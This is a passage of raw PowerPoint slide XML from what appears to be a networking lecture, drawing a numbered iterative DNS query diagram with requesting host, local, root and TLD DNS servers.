                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1049" name="Text Box 56"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2393" y="2469"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>8</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1050" name="Line 57"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="768"/>
              <a:ext cx="432" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1051" name="Text Box 59"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3611" y="1555"/>
              <a:ext cx="1267" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>TLD DNS server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1052" name="Line 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="1872"/>
              <a:ext cx="0" cy="624"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1053" name="Line 61"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3504" y="1920"/>
              <a:ext cx="0" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1054" name="Line 62"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3072" y="1008"/>
              <a:ext cx="336" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1055" name="Text Box 63"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3408" y="1008"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1056" name="Line 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2448" y="1008"/>
              <a:ext cx="480" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67"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78</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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1143000" y="0"/>
            <a:ext cx="7272338" cy="1143000"/>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a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DNS Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="3822700" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Iterative query example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3678238" y="5011738"/>
          <a:ext cx="833437" cy="638175"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s158738" name="Clip" r:id="rId4" imgW="1307263" imgH="1084139" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="1307263" imgH="1084139"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8238" y="5011738"/>
                        <a:ext cx="833437" cy="638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4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2846388" y="5589588"/>
            <a:ext cx="1589087" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>requesting host</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2055" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5172075" y="6378575"/>
            <a:ext cx="2262188" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gaia.cs.umass.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2051" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5802313" y="5811838"/>
          <a:ext cx="833437" cy="638175"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s158739" name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">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2313" y="5811838"/>
                        <a:ext cx="833437" cy="638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6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3925888" y="2936875"/>
            <a:ext cx="369887" cy="657225"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2106" name="AutoShape 7"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2107" name="Rectangle 8"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2108" name="Rectangle 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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2109" name="AutoShape 1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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2110" name="Line 11"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2111" name="Line 12"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2112" name="Rectangle 1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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2113" name="Rectangle 14"/>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fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2057" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4479925" y="1189038"/>
            <a:ext cx="2365375" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>root DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3975100" y="3624263"/>
            <a:ext cx="0" cy="1314450"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4089400" y="1928813"/>
            <a:ext cx="914400" cy="971550"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4375150" y="3090863"/>
            <a:ext cx="1485900" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4375150" y="3262313"/>
            <a:ext cx="1419225" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4298950" y="2157413"/>
            <a:ext cx="733425" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4165600" y="3652838"/>
            <a:ext cx="9525" cy="1323975"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 22"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3770313"/>
            <a:ext cx="1936750" cy="615950"/>
            <a:chOff x="2800" y="2132"/>
            <a:chExt cx="1220" cy="388"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2104" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2838" y="2178"/>
              <a:ext cx="1182" cy="300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2105" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2800" y="2132"/>
              <a:ext cx="1118" cy="388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>local DNS server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ns.ui.ac.ir</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3686175" y="4479925"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4229100" y="2146300"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4667250" y="2384425"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4981575" y="2794000"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
